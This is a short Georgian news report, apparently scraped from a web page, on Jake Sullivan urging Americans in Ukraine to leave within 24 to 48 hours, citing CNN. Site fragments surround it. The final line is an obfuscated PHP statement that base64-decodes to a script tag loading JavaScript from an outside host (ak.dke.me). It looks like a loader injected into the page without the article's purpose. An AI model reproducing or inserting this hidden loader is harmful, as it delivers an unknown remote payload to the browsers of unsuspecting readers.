celsiusi
ავერსი საქკაბელი
ეროვნული უსაფრთხოების საკითხებში თეთრი სახლის მრჩეველი ჯეიკ სალივანი უკრაინაში მყოფ აშშ-ის მოქალაქეებს ქვეყნის დაუყონებლივ დატოვებისკენ მოუწოდებს. 
 
"ყველა ამერიკელმა, რომელიც იმყოფება უკრაინაში, რაც შეიძლება სასწრაფოდ უნდა დატოვოს ქვეყანა, ნებისმიერ შემთხვევაში 24-დან 48 საათამდე პერიოდში.
 
ჩვენ, როგორც ჩანს არ შეგვიძლია მომავლის განსაზღვრა. ჩვენ ზუსტად არ ვიცით რა მოხდება, მაგრამ რისკი და მუქარა ამჟამად საკმაოდ მაღალია," - განაცხადა სალივანმა.
 
მისივე თქმით, ყველა ამერიკელი, ვინც ახლა უკრაინაში დარჩება, საკუთარ თავზე იღებს რისკს ყოველგვარი გარანტიის გარეშე, რომ აღარ ექნება სხვა საშუალება ქვეყანა დატოვოს რუსეთის უკრაინაში შეჭრის შემთხვევაში.   
 
წყარო: CNN
 
 
 
 
897
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");